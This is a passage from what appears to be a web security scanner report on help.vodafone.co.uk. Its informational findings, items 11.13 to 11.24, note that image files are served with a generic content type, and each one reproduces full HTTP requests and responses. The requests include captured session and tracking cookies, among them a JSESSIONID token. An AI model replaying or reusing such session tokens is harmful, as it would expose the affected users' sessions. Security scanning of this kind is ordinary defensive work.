GET /system/web/view/selfservice/templates/vodafone/img/dottedLine.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/main.css
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 49
Content-Type: application/octet-stream
Last-Modified: Wed, 24 Oct 2007 13:15:42 GMT
Accept-Ranges: bytes
ETag: "01369fa3f16c81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:24 GMT

GIF89a...................!.......,............
.;

11.13. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/img_forum.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/img_forum.jpg

Request

GET /system/web/view/selfservice/templates/vodafone/img/img_forum.jpg HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 6566
Content-Type: application/octet-stream
Last-Modified: Thu, 12 Jun 2008 10:24:17 GMT
Accept-Ranges: bytes
ETag: "809ee87776ccc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:23 GMT

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................H....
...[SNIP]...

11.14. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/img_store_finder.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/img_store_finder.jpg

Request

GET /system/web/view/selfservice/templates/vodafone/img/img_store_finder.jpg HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 7797
Content-Type: application/octet-stream
Last-Modified: Thu, 14 Aug 2008 09:41:16 GMT
Accept-Ranges: bytes
ETag: "08689e5f1fdc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:23 GMT

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

.............................................................F....
...[SNIP]...

11.15. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_button_joindiscussions.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_button_joindiscussions.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_button_joindiscussions.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 438
Content-Type: application/octet-stream
Last-Modified: Wed, 09 Jun 2010 14:23:56 GMT
Accept-Ranges: bytes
ETag: "026c664df7cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:47 GMT

.PNG
.
...IHDR.......d.....Zn......tEXtSoftware.Adobe ImageReadyq.e<...-PLTE......RRR}}}hhh. .@@..........pp....................IDATx...K.. ...'....;...1.%....T.N.......Cp1M/l.....=..P.&.x.h..k..E.
...[SNIP]...

11.16. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headerAlpha_home.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headerAlpha_home.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headerAlpha_home.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 945
Content-Type: application/octet-stream
Last-Modified: Thu, 10 Jun 2010 14:11:48 GMT
Accept-Ranges: bytes
ETag: "0ea43dda68cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR.......".....0'X.....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.........""".........fff......UUU......www333DDD........IDATx....v. ....E@..m.:3.H.(.....].3 I@..c........1v........C9...\
...[SNIP]...

11.17. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_browsetopics.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_browsetopics.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_browsetopics.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1189
Content-Type: application/octet-stream
Last-Modified: Fri, 11 Jun 2010 09:57:30 GMT
Accept-Ranges: bytes
ETag: "0a133814c9cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR......2.....B.......tEXtSoftware.Adobe ImageReadyq.e<...0PLTE...................................................K....IDATx..........R....v%A...l.s.9&>..NH..6T.i..]I2....:./By..4/..4.
...[SNIP]...

11.18. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_meettheteam.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_meettheteam.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_meettheteam.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 720
Content-Type: application/octet-stream
Last-Modified: Fri, 11 Jun 2010 10:20:54 GMT
Accept-Ranges: bytes
ETag: "07dc64f9cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR...U...L.....+..;....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.................................................C^....6IDATx...... .EAQ.E..mw.G .,....4.J..1$.... .$u..c.t"....$.PB......
...[SNIP]...

11.19. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_or-fs8.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_or-fs8.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_or-fs8.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 771
Content-Type: application/octet-stream
Last-Modified: Wed, 16 Jun 2010 11:57:36 GMT
Accept-Ranges: bytes
ETag: "0b8601c4bdcb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR...(...(......'x.....PLTE..................................................................................................................iii...............uuu......^^^............RRR
...[SNIP]...

11.20. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_search-form-input.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_search-form-input.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_search-form-input.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 212
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Jun 2010 09:10:16 GMT
Accept-Ranges: bytes
ETag: "08c5a3e216cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

.PNG
.
...IHDR.......4.....||......tEXtSoftware.Adobe ImageReadyq.e<...<PLTE............................................................`.._....IDATx..... ...
......r.i...t.t...U..c..Mf
0......x..
...[SNIP]...

11.21. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_sectionTeta_phoneTeaser.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_sectionTeta_phoneTeaser.jpg

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_sectionTeta_phoneTeaser.jpg HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 50101
Content-Type: application/octet-stream
Last-Modified: Thu, 10 Jun 2010 14:02:56 GMT
Accept-Ranges: bytes
ETag: "0282ba0a58cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................K....
...[SNIP]...

11.22. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_shelfs_li_line.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_shelfs_li_line.gif

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_shelfs_li_line.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 123
Content-Type: application/octet-stream
Last-Modified: Fri, 11 Jun 2010 11:03:20 GMT
Accept-Ranges: bytes
ETag: "0cc95b3559cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

GIF89a
.Z..........!.......,....
.Z...R....{.PdSN......Q.H.f.Zh......<..}....~...s.]..L
.D...\J..g5J.Z.....VA.W2..E.Sl....;

11.23. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_topic_shelf.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_topic_shelf.gif

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_topic_shelf.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 11523
Content-Type: application/octet-stream
Last-Modified: Fri, 11 Jun 2010 09:49:36 GMT
Accept-Ranges: bytes
ETag: "0f8ac664b9cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:46 GMT

GIF89a..W...............................................................................................................................................................................................
...[SNIP]...

11.24. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bullet_arrow_grey-on-white.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/redesign/images/bullet_arrow_grey-on-white.png

Request

GET /system/web/view/selfservice/templates/vodafone/img/redesign/images/bullet_arrow_grey-on-white.png HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/redesign/main.css?v=20110504
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265; BIGipServerpool_ems00820ss=1426065674.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 229
Content-Type: application/octet-stream
Last-Modified: Mon, 07 Jun 2010 09:10:16 GMT
Accept-Ranges: bytes
ETag: "08c5a3e216cb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:47 GMT

.PNG
.
...IHDR.......
